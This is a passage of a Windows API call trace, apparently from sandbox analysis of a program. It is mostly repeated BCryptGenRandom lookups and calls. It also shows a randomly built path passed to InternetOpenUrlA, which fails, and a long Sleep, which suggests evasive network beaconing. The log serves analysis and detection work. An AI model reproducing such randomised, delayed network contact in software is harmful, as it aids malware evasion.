hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.107] GetProcessHeap () returned 0x440000 [0227.107] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0227.107] lstrcpyA (in: lpString1=0x472900, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0227.107] lstrcatA (in: lpString1="\x04", lpString2="/bJf180h669d5um4AauUcOb622kLyxbRgxgp/he8Uj1kHfavio7tUfLu3O8Olzge1d4swutcAewuWaxkja/NplPYr4aPey23e5Mw1z8jb96Hdpw7y6sse8c1jrvb/" | out: lpString1="\x04/bJf180h669d5um4AauUcOb622kLyxbRgxgp/he8Uj1kHfavio7tUfLu3O8Olzge1d4swutcAewuWaxkja/NplPYr4aPey23e5Mw1z8jb96Hdpw7y6sse8c1jrvb/") returned="\x04/bJf180h669d5um4AauUcOb622kLyxbRgxgp/he8Uj1kHfavio7tUfLu3O8Olzge1d4swutcAewuWaxkja/NplPYr4aPey23e5Mw1z8jb96Hdpw7y6sse8c1jrvb/" [0227.107] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0227.108] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/bJf180h669d5um4AauUcOb622kLyxbRgxgp/he8Uj1kHfavio7tUfLu3O8Olzge1d4swutcAewuWaxkja/NplPYr4aPey23e5Mw1z8jb96Hdpw7y6sse8c1jrvb/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0227.108] GetProcessHeap () returned 0x440000 [0227.108] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0227.108] GetProcessHeap () returned 0x440000 [0227.108] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16f80 | out: hHeap=0x440000) returned 1 [0227.108] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0227.108] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0227.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0227.109] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0227.109] Sleep (dwMilliseconds=0x1169a) [0227.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0227.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0227.368] GetProcessHeap () returned 0x440000 [0227.368] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0227.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0227.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0227.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0227.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0227.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e34, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x4d5e34) returned 0x0 [0227.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0227.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0227.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0227.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e55, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4d5e55) returned 0x0 [0227.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0227.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.382] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.382] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.382] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0227.382] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0227.382] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e6c, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4d5e6c) returned 0x0 [0227.382] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.383] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.383] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.383] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.383] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.383] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.383] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0227.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 